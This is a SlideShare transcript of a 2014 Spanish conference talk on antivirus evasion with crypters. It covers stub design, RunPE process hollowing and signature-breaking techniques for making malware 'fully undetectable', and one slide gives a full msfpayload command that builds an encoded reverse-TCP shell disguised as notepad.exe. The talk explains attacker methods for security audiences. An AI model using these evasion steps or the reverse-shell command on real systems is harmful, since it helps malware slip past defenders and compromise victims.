SlideShare una empresa de Scribd logo

Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar

INCIDE
INCIDE

Charla en MundoHackerDay sobre técnicas de evasión de AntiVirus y uso de Crypters.

Tecnología
1 de 45
Descargar para leer sin conexión
Evasión de Anti-Virus: Uso de Crypters Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
Whoami ncd:~ apasamar$ whoami apasamar apasamar@incide.es @apasamar a.k.a brajan ncd:~ apasamar$ cat apasamar.cv Ingeniero superior y Máster en seguridad de la información Socio fundador de INCIDE: Expertos en prueba electrónica Forensics / Periciales Respuesta a incidentes Consultoría/Auditoría de Seguridad ! ncd:~ apasamar$ rm apasamar.cv
de qué va esto... • Introducción • AV’s como funcionan • Tipos de malware y detección AV’s • Medidas de evasión • Auto-cifrado, Polimorfismo, Ofuscación, Compresión • Crypters • tipos y funcionamiento • stub • stub FUD • técnicas Modding • Recursos
introducción • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • Empresas AV’s —> Detectar MALWARE • Malos: INDETECTAR MALWARE
introducción • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • Empresas AV’s —> Detectar MALWARE • Malos: INDETECTAR MALWARE
introducción Objetivo de los Malos:
introducción Objetivo de los Malos:
AV’s howto • Los AntiVirus escanean binarios EN DISCO • NO analizan la memoria, sino los binarios en disco que arrancan procesos • Buscan firmas: cadenas binarias (BBDD) • Buscan elementos/técnicas maliciosas (Heurística):APIS, funciones, XOR, etc • Sandbox (ejecución parcial): búsqueda de técnicas de descifrado, etc
AV’s howto EJECUTABLE DISCO RAM PROCESO ? SCAN ? AV
AV’s howto • Proceso análisis de los AV’s: Ataques
AV’s howto • Recomendado: “Abusing File Processing in Malware Detectors for Fun and Profit” (2012) Suman Jana and Vitaly Shmatikov The University of Texas at Austin
AV’s howto • Metasploit Framework (Rapid7) • Community Edition: • msfpayload windows/shell/ reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe • Pro Edition: • Generate AV-evading Dynamic Payloads
tipos de malware y detección AV’s • Programas espía comerciales: (white list, firmados) • e-blaster • 007 • perfect keylogger
• Malware recién creado: • detección baja (sin firmas) • posible detección heurística tipos de malware y detección AV’s
• Malware existente: (muy conocidos, firmas y heurística) • troyanos • downloaders • stealers • reverse shells • ... tipos de malware y detección AV’s
¿cómo se puede indetectar el malware ya detectado ? • C r y p t e r s: • Software que permite cifrar CUALQUIER MALWARE para hacerlo indetectable a los antivirus. • La rutina de descifrado tiene que poder ejecutarse (no se cifra)
crypters
builder / stub • Builder: • Encargado de crear el ejecutable compuesto por el STUB y el MALWARE CIFRADO • Stub: • Encargado de descifrar el MALWARE CIFRADO y ejecutarlo
! ! ! ! ! ! ! ! ! CRYPTER + STUB STUB MALWARE DETECTADO MALWARE CIFRADO STUB CRYPTER (Builder) XOR, RC4, ... exe dll recurso builder / stub
STUB MALWARE CIFRADO STUB MALWARE CIFRADOKEY Separador Separador También se puede usar un recurso builder / stub
• Tipos de crypters: • ScanTime • RunTime builder / stub
• ScanTime STUB MALWARE CIFRADO MALWARE DETECTADO DISCO AV stub
• RunTime STUB MALWARE CIFRADO DISCO RAM MALWAREDETECTADO AV stub
• Componentes STUB: • Rutina Decrypt • RunPe ! stub
RunPE o Dynamic Forking CreateProcess PROCESO 1 (CREATE_SUSPENDED) GetThreadContext PEB EBX EAX BaseAddress 1 EP I +8 PROCESO 2 ReadFile WriteProcessMemoryEP 2 BaseAddress 2 SetThreadContextResumeThread
FUD • Objetivo: Stub FUD (Full UnDetectable) • Indetección desde Fuente (Source) • Indetección desde Binario • ¿Cómo? • MODDING
modding source • A mano o con ofuscadores: • Reemplazar funciones (SPLIT,..) • Reemplazar y/o ofuscar funciones/strings/variables y Cifrar con rot13 o Hex • Cifrados: RC4 y XOR quemadas • Alternativas:TEA, DES, etc • RunPE alternativos • APIs Falsas • TLB (Tab Library File) • Trash code
modding binario • Indetección desde Binario: • Se utilizan diferentes técnicas como: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR y variantes • Tips
• Se modea el STUB, el BUILDER no es parte del malware in the wild • Se buscan las FIRMAS o puntos de detección • Firmas sencillas • Firmas Múltiples • Heurística modding binario
AV’s howto • Recomendado: “Bypassing Anti-Virus Scanners” (2012) InterNOT Security Team
• ¿Rutina CIFRADO/DESCIFRADO dentro del STUB? stub.exe EP Firmas stub.exe OLD EP Firmas NEW EP CIFRADO Descifrado modding binario
• SCAN DEL STUB ORIGINAL modding binario
• RUTINA DE CIFRADO • NEW EP • INSERTAR RUTINA • .text SECTION • desde 1050 • hasta import table modding binario
• RUTINA CIFRADO EN NEW EP modding binario
• RUTINA DESCIFRADOY EJECUCIÓN EN NEW EP modding binario
• SCAN DEL STUB MODIFICADO modding binario 16 AV’s KO
• TÉCNICAS: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR y variantes • Tips modding binario
• Técnica DSplit: Cabecera Cuerpo EXE Cabecera Cuerpo EXE 1000 bytes Cabecera Cuerpo EXE 2000 bytes Cabecera Cuerpo EXE 3000 bytes Cabecera Cuerpo EXE ··· Nx1000 bytes modding binario
• Técnica AvFucker: Cabecera Cuerpo EXE Cuerpo EXECabecera 0000000000 1000 bytes Cabecera Cuerpo EXE0000000000 1000 bytes Cabecera Cuerpo EXE0000000000 1000 bytes Cabecera Cuerpo EXE ··· 0000000000 1000 bytes modding binario
• Técnica RIT • localizar firma • si son instrucciones partir flujo • saltar a otro punto (hueco) • finalizar las instrucciones • retornar al punto posterior ! modding binario
• Técnica XOR • localizar firma/s • aplicar XOR con un valor p.e. 22 • Modificar EP o saltar a un hueco • aplicar XOR 22 • retornar al punto posterior ! modding binario
Detectado (EP): XOR de los bytes detectados: Nuevo EP ( Instruccione XOR reverso): modding binario
otras técnicas • Añadir APIs Falsas • Edición Hexadecimal de cadenas • Mover/cambiar direcciones de llamadas a las funciones • Cambiar llamadas por nombre/offeset • Introducir en STUB la función de la DLL detectada !
recursos • http://www.indetectables.net • http://www.udtools.net • http://www.masters-hackers.info • http://www.level-23.biz/ • http://www.corp-51.net/ • http://www.underc0de.org !
Avda. Diagonal, 640 6ª Planta 08017 Barcelona info@incide.es http://www.incide.es http://www.twitter.com/1NC1D3 http://www.atrapadosporlosbits.com http://www.youtube.com/incidetube Companies > INCIDE - Investigación Digital Tel./Fax. +34 932 546 277 / +34 932 546 314 ¿ P R E G U N T A S ?

Recomendados

NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirusNoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirusINCIDE
 
Jaime Peñalba y Javier Rodríguez - Live Free or Die Hacking [RootedCON 2012]
Jaime Peñalba y Javier Rodríguez - Live Free or Die Hacking [RootedCON 2012]Jaime Peñalba y Javier Rodríguez - Live Free or Die Hacking [RootedCON 2012]
Jaime Peñalba y Javier Rodríguez - Live Free or Die Hacking [RootedCON 2012]RootedCON
 
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]RootedCON
 
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]RootedCON
 
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]RootedCON
 
José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]RootedCON
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)Jaime Sánchez
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...RootedCON
 

Recomendados

NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirusNoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirusINCIDE
 
Jaime Peñalba y Javier Rodríguez - Live Free or Die Hacking [RootedCON 2012]
Jaime Peñalba y Javier Rodríguez - Live Free or Die Hacking [RootedCON 2012]Jaime Peñalba y Javier Rodríguez - Live Free or Die Hacking [RootedCON 2012]
Jaime Peñalba y Javier Rodríguez - Live Free or Die Hacking [RootedCON 2012]RootedCON
 
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]RootedCON
 
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]RootedCON
 
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]
Javier Marcos - Detección de amenazas a escala con osquery [rooted2019]RootedCON
 
José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]José Ramón Palanco - NoSQL Security [RootedCON 2011]
José Ramón Palanco - NoSQL Security [RootedCON 2011]RootedCON
 
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)
I Know Your P4$$w0rd (And If I Don't, I Will Guess It...)Jaime Sánchez
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...RootedCON
 
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]RootedCON
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]RootedCON
 
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]RootedCON
 
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...RootedCON
 
Authenticode para malotes
Authenticode para malotesAuthenticode para malotes
Authenticode para malotesRamon
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]RootedCON
 
Taller SITEC 2010
Taller SITEC 2010Taller SITEC 2010
Taller SITEC 2010Jorge Hernandez
 
Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsTecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsn3xasec
 
Presentacion Hacking Asterisk
Presentacion Hacking AsteriskPresentacion Hacking Asterisk
Presentacion Hacking AsteriskAndres Mauricio Mujica Zalamea
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonWebsec México, S.C.
 
Cain
CainCain
Caingasay
 
Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]
Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]
Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]RootedCON
 
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDayAntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDayINCIDE
 
Binders and crypters
Binders and cryptersBinders and crypters
Binders and cryptersTej Singh
 
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las VegasGet the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las VegasShawn Tuma
 
Anti-Virus Evasion Techniques and Countermeasures
Anti-Virus Evasion Techniques and CountermeasuresAnti-Virus Evasion Techniques and Countermeasures
Anti-Virus Evasion Techniques and Countermeasuresn|u - The Open Security Community
 
Evadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de cryptersEvadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de cryptersINCIDE
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionNeel Pathak
 
Instrucciones Para Solicitar Subastas Cliente
Instrucciones Para Solicitar Subastas ClienteInstrucciones Para Solicitar Subastas Cliente
Instrucciones Para Solicitar Subastas ClienteRafa Moreno
 
2008 comp-cuantica
2008 comp-cuantica2008 comp-cuantica
2008 comp-cuantica74689899
 
Practical Solutions To Internet Marketing Legal Compliance, pt 2
Practical Solutions To Internet Marketing Legal Compliance, pt 2Practical Solutions To Internet Marketing Legal Compliance, pt 2
Practical Solutions To Internet Marketing Legal Compliance, pt 2Affiliate Summit
 

Más contenido relacionado

La actualidad más candente

Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]RootedCON
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]RootedCON
 
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]RootedCON
 
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...RootedCON
 
Authenticode para malotes
Authenticode para malotesAuthenticode para malotes
Authenticode para malotesRamon
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]RootedCON
 
Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsTecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsn3xasec
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonWebsec México, S.C.
 
Cain
CainCain
Caingasay
 
Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]
Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]
Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]RootedCON
 

La actualidad más candente (13)

Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
Manuel Blanco - GNU/Linux Binary Exploitation I&II [rooted2018]
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
Rubén Rodenas & Rubén Garrote - TLOTA - The lord of the ATMs [rooted2017]
 
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
David Reguera & Yago Jesus - Rootkit Busters ES [rooted2019]
 
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
 
Authenticode para malotes
Authenticode para malotesAuthenticode para malotes
Authenticode para malotes
 
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
Gerardo Garcia Peña - Crypto Goofs... [rooted2018]
 
Taller SITEC 2010
Taller SITEC 2010Taller SITEC 2010
Taller SITEC 2010
 
Tecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con idsTecnicas avanzadas de penetracion a sistemas con ids
Tecnicas avanzadas de penetracion a sistemas con ids
 
Presentacion Hacking Asterisk
Presentacion Hacking AsteriskPresentacion Hacking Asterisk
Presentacion Hacking Asterisk
 
Pentesting 101 por Paulino Calderon
Pentesting 101 por Paulino CalderonPentesting 101 por Paulino Calderon
Pentesting 101 por Paulino Calderon
 
Cain
CainCain
Cain
 
Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]
Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]
Roberto Amado - Threat Hunting - Cazando grupos APT [rootedvlc2019]
 

Destacado

AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDayAntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDayINCIDE
 
Binders and crypters
Binders and cryptersBinders and crypters
Binders and cryptersTej Singh
 
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las VegasGet the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las VegasShawn Tuma
 
Evadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de cryptersEvadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de cryptersINCIDE
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionNeel Pathak
 
Instrucciones Para Solicitar Subastas Cliente
Instrucciones Para Solicitar Subastas ClienteInstrucciones Para Solicitar Subastas Cliente
Instrucciones Para Solicitar Subastas ClienteRafa Moreno
 
2008 comp-cuantica
2008 comp-cuantica2008 comp-cuantica
2008 comp-cuantica74689899
 
Practical Solutions To Internet Marketing Legal Compliance, pt 2
Practical Solutions To Internet Marketing Legal Compliance, pt 2Practical Solutions To Internet Marketing Legal Compliance, pt 2
Practical Solutions To Internet Marketing Legal Compliance, pt 2Affiliate Summit
 
Velfærdsteknologi til ældreplejen
Velfærdsteknologi til ældreplejenVelfærdsteknologi til ældreplejen
Velfærdsteknologi til ældreplejenIS IT A BIRD
 
Minnesota D-Star Disaster Network
Minnesota D-Star Disaster Network Minnesota D-Star Disaster Network
Minnesota D-Star Disaster Network Erik Westgard
 
Shahaf, Ophir - I3: Innovation, Infraestructure & Investment – Drivers of Res...
Shahaf, Ophir - I3: Innovation, Infraestructure & Investment – Drivers of Res...Shahaf, Ophir - I3: Innovation, Infraestructure & Investment – Drivers of Res...
Shahaf, Ophir - I3: Innovation, Infraestructure & Investment – Drivers of Res...ponencias_mihealth2012
 
Avaliação de argamassas com entulho reciclados, por procedimentos racionais d...
Avaliação de argamassas com entulho reciclados, por procedimentos racionais d...Avaliação de argamassas com entulho reciclados, por procedimentos racionais d...
Avaliação de argamassas com entulho reciclados, por procedimentos racionais d...Petiano Camilo Bin
 
Austin Elixir: Slack Bots With Hedwig
Austin Elixir: Slack Bots With HedwigAustin Elixir: Slack Bots With Hedwig
Austin Elixir: Slack Bots With Hedwigedebill
 
Brochure 32 page-english
Brochure 32 page-englishBrochure 32 page-english
Brochure 32 page-englishjumiss
 
Violations of press freedom in Τurkey
Violations of press freedom in ΤurkeyViolations of press freedom in Τurkey
Violations of press freedom in Τurkeyaugofetas
 

Destacado (20)

AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDayAntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay
 
Binders and crypters
Binders and cryptersBinders and crypters
Binders and crypters
 
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las VegasGet the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
 
Anti-Virus Evasion Techniques and Countermeasures
Anti-Virus Evasion Techniques and CountermeasuresAnti-Virus Evasion Techniques and Countermeasures
Anti-Virus Evasion Techniques and Countermeasures
 
Evadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de cryptersEvadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de crypters
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
 
Instrucciones Para Solicitar Subastas Cliente
Instrucciones Para Solicitar Subastas ClienteInstrucciones Para Solicitar Subastas Cliente
Instrucciones Para Solicitar Subastas Cliente
 
2008 comp-cuantica
2008 comp-cuantica2008 comp-cuantica
2008 comp-cuantica
 
Practical Solutions To Internet Marketing Legal Compliance, pt 2
Practical Solutions To Internet Marketing Legal Compliance, pt 2Practical Solutions To Internet Marketing Legal Compliance, pt 2
Practical Solutions To Internet Marketing Legal Compliance, pt 2
 
Velfærdsteknologi til ældreplejen
Velfærdsteknologi til ældreplejenVelfærdsteknologi til ældreplejen
Velfærdsteknologi til ældreplejen
 
Minnesota D-Star Disaster Network
Minnesota D-Star Disaster Network Minnesota D-Star Disaster Network
Minnesota D-Star Disaster Network
 
Mow : una experiencia con ROR
Mow : una experiencia con RORMow : una experiencia con ROR
Mow : una experiencia con ROR
 
Shahaf, Ophir - I3: Innovation, Infraestructure & Investment – Drivers of Res...
Shahaf, Ophir - I3: Innovation, Infraestructure & Investment – Drivers of Res...Shahaf, Ophir - I3: Innovation, Infraestructure & Investment – Drivers of Res...
Shahaf, Ophir - I3: Innovation, Infraestructure & Investment – Drivers of Res...
 
Jornada de Medios de Pago Online - François Hélard, Adyen
Jornada de Medios de Pago Online - François Hélard, AdyenJornada de Medios de Pago Online - François Hélard, Adyen
Jornada de Medios de Pago Online - François Hélard, Adyen
 
Avaliação de argamassas com entulho reciclados, por procedimentos racionais d...
Avaliação de argamassas com entulho reciclados, por procedimentos racionais d...Avaliação de argamassas com entulho reciclados, por procedimentos racionais d...
Avaliação de argamassas com entulho reciclados, por procedimentos racionais d...
 
Austin Elixir: Slack Bots With Hedwig
Austin Elixir: Slack Bots With HedwigAustin Elixir: Slack Bots With Hedwig
Austin Elixir: Slack Bots With Hedwig
 
Brochure 32 page-english
Brochure 32 page-englishBrochure 32 page-english
Brochure 32 page-english
 
Violations of press freedom in Τurkey
Violations of press freedom in ΤurkeyViolations of press freedom in Τurkey
Violations of press freedom in Τurkey
 
Casimiro liceaga
Casimiro liceagaCasimiro liceaga
Casimiro liceaga
 
mimikatz @ asfws
mimikatz @ asfwsmimikatz @ asfws
mimikatz @ asfws
 

Similar a Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar

rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...RootedCON
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoWebsec México, S.C.
 
Pentest - El Arte de la Guerra
Pentest - El Arte de la GuerraPentest - El Arte de la Guerra
Pentest - El Arte de la GuerraLuis Cortes Zavala
 
Pen test: El arte de la guerra
Pen test: El arte de la guerraPen test: El arte de la guerra
Pen test: El arte de la guerraFutura Networks
 
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)
STIC XV CCN-CERT - Cibervigilancia con warrior (Ivan Portillo y Wiktor Nykiel)Iván Portillo
 
Hack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstackHack & beers lleida seguridad en desarrollo fullstack
Hack & beers lleida seguridad en desarrollo fullstackMarc Pàmpols
 
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)
Virus, el arte de algunos - Alberto García de Dios (/Rooted CON 2011)Oskar Laguillo
 
fuzzing.pdf
fuzzing.pdffuzzing.pdf
fuzzing.pdfndi_z
 
Ramón Pinuaga - Authenticode para malotes [rooted2017]
